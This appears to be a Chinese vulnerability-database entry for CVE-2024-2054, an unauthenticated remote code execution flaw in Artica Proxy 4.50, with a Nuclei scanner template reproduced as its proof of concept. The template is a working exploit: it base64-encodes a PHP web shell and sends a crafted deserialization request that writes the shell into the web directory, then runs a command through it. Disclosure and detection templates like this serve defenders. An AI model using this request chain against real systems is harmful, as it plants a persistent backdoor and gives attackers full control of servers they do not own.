漏洞信息
漏洞名称: Artica Proxy - Remote Code Execution
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Artica Proxy是一款广泛使用的代理服务器软件,主要用于企业级网络环境中,提供网络流量管理和安全防护功能。该软件因其高效的性能和易用性,在多个行业中得到广泛应用。此次发现的远程代码执行漏洞(CVE-2024-2054)允许攻击者通过利用特定的端点,在服务器上执行任意命令,可能导致系统完全被控制。漏洞的技术根源在于软件未能正确处理用户输入,导致攻击者可以构造恶意请求,绕过安全限制,执行未授权的代码。这种漏洞的存在,使得攻击者无需任何形式的认证即可远程利用,极大地增加了安全风险。成功利用此漏洞的攻击者可以完全控制受影响的系统,进行数据窃取、服务中断等恶意操作,对企业和组织的网络安全构成严重威胁。因此,建议所有使用Artica Proxy的用户立即更新到最新版本,以修复此漏洞。
产品厂商: articatech
产品名称: artica_proxy
影响版本: 4.50
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b5def12c15968859278c86990b15e11cad2ada7c/http%2Fcves%2F2024%2FCVE-2024-2054.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68
| id: CVE-2024-2054
info: name: Artica Proxy - Remote Code Execution author: pussycat0x severity: critical description: | This template targets a remote code execution vulnerability in Artica Proxy by exploiting a specific endpoint. impact: | Successful exploitation allows attackers to execute arbitrary commands on the server, potentially leading to full system compromise. remediation: | Update Artica Proxy to the latest version that addresses this vulnerability and implement proper input validation. reference: - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2054.md - https://github.com/Madan301/CVE-2024-2054/blob/main/CVE-2024-2054.py - https://github.com/tanjiti/sec_profile - https://github.com/Madan301/CVE-2024-2054 - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-2054 cwe-id: CWE-502 epss-score: 0.79565 epss-percentile: 0.99025 cpe: cpe:2.3:a:articatech:artica_proxy:4.50:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: articatech product: artica_proxy tags: cve,cve2024,rce,artica,intrusive
variables: websh: '<?php system($_GET["cmd"]);?>' payload: '{{base64(websh)}}'
http: - raw: - | GET /wizard/wiz.upload.php HTTP/1.1 Host: {{Hostname}}
- | GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'{{payload}}+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.32.3
- | GET /wizard/wiz.upload.php?cmd=id HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "wiz.wizard.progress.php"
- type: regex part: body regex: - "uid=[0-9]+.*gid=[0-9]+.*"
|